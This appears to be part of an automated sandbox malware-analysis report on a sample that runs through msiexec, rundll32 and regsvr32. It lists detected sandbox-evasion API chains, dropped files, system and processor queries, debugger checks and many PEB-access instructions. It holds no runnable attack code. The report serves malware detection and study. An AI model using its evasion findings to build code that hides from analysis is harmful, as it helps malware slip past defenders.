Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_4-47011

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_4-47318

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetAdaptersInfo,

4_2_7EE4B260

Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\8f08\701188\701188.winmd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIEF45.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIF014.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIEFA4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIEFD4.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 5.4 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 2.3 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 2.3 %

Source: C:\Windows\SysWOW64\rundll32.exe TID: 7032	Thread sleep count: 124 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7032	Thread sleep time: -16120000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_7EE4ADB0 GetSystemInfo,

4_2_7EE4ADB0

Source: C:\Windows\SysWOW64\rundll32.exe

Thread delayed: delay time: 130000

Jump to behavior

Source: rundll32.exe, 00000004.00000002.4166785413.0000000002D5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4166785413.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1784679532.0000000002DC1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

graph_4-47008

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_7EE61417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_7EE61417

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE29AB9 mov edx, dword ptr fs:[00000030h]	4_2_7EE29AB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE33740 mov ecx, dword ptr fs:[00000030h]	4_2_7EE33740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE33740 mov ecx, dword ptr fs:[00000030h]	4_2_7EE33740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE33740 mov eax, dword ptr fs:[00000030h]	4_2_7EE33740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE33740 mov edx, dword ptr fs:[00000030h]	4_2_7EE33740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4B260 mov ecx, dword ptr fs:[00000030h]	4_2_7EE4B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4B260 mov eax, dword ptr fs:[00000030h]	4_2_7EE4B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4B260 mov edx, dword ptr fs:[00000030h]	4_2_7EE4B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4B260 mov eax, dword ptr fs:[00000030h]	4_2_7EE4B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4B260 mov ecx, dword ptr fs:[00000030h]	4_2_7EE4B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE50C00 mov ecx, dword ptr fs:[00000030h]	4_2_7EE50C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4ADB0 mov edx, dword ptr fs:[00000030h]	4_2_7EE4ADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4E690 mov ecx, dword ptr fs:[00000030h]	4_2_7EE4E690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov ecx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov edx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov eax, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov ecx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov ecx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov ecx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov eax, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov ecx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov edx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov eax, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov eax, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov edx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov ecx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov ecx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov eax, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390 mov edx, dword ptr fs:[00000030h]	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4E1C0 mov edx, dword ptr fs:[00000030h]	4_2_7EE4E1C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE45EC0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE45EC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov eax, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov edx, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov eax, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov eax, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov eax, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov eax, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov eax, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov edx, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0 mov eax, dword ptr fs:[00000030h]	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE29F6C mov edx, dword ptr fs:[00000030h]	4_2_7EE29F6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE35CD0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE35CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE5DDF9 mov eax, dword ptr fs:[00000030h]	4_2_7EE5DDF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE57D90 mov ecx, dword ptr fs:[00000030h]	4_2_7EE57D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE57D90 mov edx, dword ptr fs:[00000030h]	4_2_7EE57D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE57D90 mov eax, dword ptr fs:[00000030h]	4_2_7EE57D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE57D90 mov ecx, dword ptr fs:[00000030h]	4_2_7EE57D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov eax, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov eax, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov eax, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov eax, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov eax, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov edx, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov eax, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov edx, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov eax, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov eax, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov eax, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov eax, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov eax, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov eax, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE49A90 mov eax, dword ptr fs:[00000030h]	4_2_7EE49A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE77A0D mov eax, dword ptr fs:[00000030h]	4_2_7EE77A0D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE2DA10 mov edx, dword ptr fs:[00000030h]	4_2_7EE2DA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE2DA10 mov eax, dword ptr fs:[00000030h]	4_2_7EE2DA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE47B7B mov ecx, dword ptr fs:[00000030h]	4_2_7EE47B7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE29B5B mov edx, dword ptr fs:[00000030h]	4_2_7EE29B5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE29B3B mov edx, dword ptr fs:[00000030h]	4_2_7EE29B3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE29B17 mov edx, dword ptr fs:[00000030h]	4_2_7EE29B17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE779DC mov eax, dword ptr fs:[00000030h]	4_2_7EE779DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE77998 mov eax, dword ptr fs:[00000030h]	4_2_7EE77998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE2D6C0 mov edx, dword ptr fs:[00000030h]	4_2_7EE2D6C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE5F610 mov eax, dword ptr fs:[00000030h]	4_2_7EE5F610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE272D0 mov edx, dword ptr fs:[00000030h]	4_2_7EE272D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4D3E0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE4D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4D3E0 mov eax, dword ptr fs:[00000030h]	4_2_7EE4D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4D3E0 mov ecx, dword ptr fs:[00000030h]	4_2_7EE4D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4D3E0 mov edx, dword ptr fs:[00000030h]	4_2_7EE4D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4D3E0 mov eax, dword ptr fs:[00000030h]	4_2_7EE4D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE2D370 mov edx, dword ptr fs:[00000030h]	4_2_7EE2D370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE26E80 mov eax, dword ptr fs:[00000030h]	4_2_7EE26E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov edx, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov edx, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov edx, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov eax, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov edx, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov ecx, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov ecx, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov ecx, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE38E10 mov edx, dword ptr fs:[00000030h]	4_2_7EE38E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4AF60 mov eax, dword ptr fs:[00000030h]	4_2_7EE4AF60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE28F30 mov edx, dword ptr fs:[00000030h]	4_2_7EE28F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE28F30 mov ecx, dword ptr fs:[00000030h]	4_2_7EE28F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE28F30 mov ecx, dword ptr fs:[00000030h]	4_2_7EE28F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE26F1A mov eax, dword ptr fs:[00000030h]	4_2_7EE26F1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE26C70 mov edx, dword ptr fs:[00000030h]	4_2_7EE26C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE32A20 mov eax, dword ptr fs:[00000030h]	4_2_7EE32A20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE58870 mov ecx, dword ptr fs:[00000030h]	4_2_7EE58870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE58870 mov edx, dword ptr fs:[00000030h]	4_2_7EE58870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE58870 mov eax, dword ptr fs:[00000030h]	4_2_7EE58870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE58870 mov ecx, dword ptr fs:[00000030h]	4_2_7EE58870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov eax, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov eax, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov eax, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov eax, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov eax, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov eax, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800 mov eax, dword ptr fs:[00000030h]	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE707C8 mov ecx, dword ptr fs:[00000030h]	4_2_7EE707C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE247D4 mov ecx, dword ptr fs:[00000030h]	4_2_7EE247D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE247D4 mov ecx, dword ptr fs:[00000030h]	4_2_7EE247D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE247D4 mov edx, dword ptr fs:[00000030h]	4_2_7EE247D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE32420 mov edx, dword ptr fs:[00000030h]	4_2_7EE32420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE32420 mov eax, dword ptr fs:[00000030h]	4_2_7EE32420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE2E5A0 mov eax, dword ptr fs:[00000030h]	4_2_7EE2E5A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4A560 mov ecx, dword ptr fs:[00000030h]	4_2_7EE4A560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4A560 mov eax, dword ptr fs:[00000030h]	4_2_7EE4A560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4A560 mov ecx, dword ptr fs:[00000030h]	4_2_7EE4A560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE242E4 mov edx, dword ptr fs:[00000030h]	4_2_7EE242E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE242E4 mov ecx, dword ptr fs:[00000030h]	4_2_7EE242E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE24280 mov edx, dword ptr fs:[00000030h]	4_2_7EE24280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE24280 mov ecx, dword ptr fs:[00000030h]	4_2_7EE24280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE24280 mov ecx, dword ptr fs:[00000030h]	4_2_7EE24280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE24280 mov ecx, dword ptr fs:[00000030h]	4_2_7EE24280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE24280 mov ecx, dword ptr fs:[00000030h]	4_2_7EE24280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE24280 mov edx, dword ptr fs:[00000030h]	4_2_7EE24280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE2E250 mov edx, dword ptr fs:[00000030h]	4_2_7EE2E250
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4E3A0 mov eax, dword ptr fs:[00000030h]	4_2_7EE4E3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE34392 mov edx, dword ptr fs:[00000030h]	4_2_7EE34392
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A0A4 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3A0A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A0A4 mov edx, dword ptr fs:[00000030h]	4_2_7EE3A0A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4E1B0 mov eax, dword ptr fs:[00000030h]	4_2_7EE4E1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov edx, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov ecx, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov eax, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov eax, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov eax, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov eax, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov eax, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov edx, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160 mov eax, dword ptr fs:[00000030h]	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4C170 mov eax, dword ptr fs:[00000030h]	4_2_7EE4C170
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEFD6C0 mov edx, dword ptr fs:[00000030h]	6_2_7EEFD6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF15EC0 mov ecx, dword ptr fs:[00000030h]	6_2_7EF15EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov eax, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov edx, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov eax, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov eax, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov eax, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov eax, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov eax, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov ecx, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov edx, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0 mov eax, dword ptr fs:[00000030h]	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1E690 mov ecx, dword ptr fs:[00000030h]	6_2_7EF1E690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF6E80 mov eax, dword ptr fs:[00000030h]	6_2_7EEF6E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF17660 mov ecx, dword ptr fs:[00000030h]	6_2_7EF17660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF2F610 mov eax, dword ptr fs:[00000030h]	6_2_7EF2F610
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF47D4 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF47D4
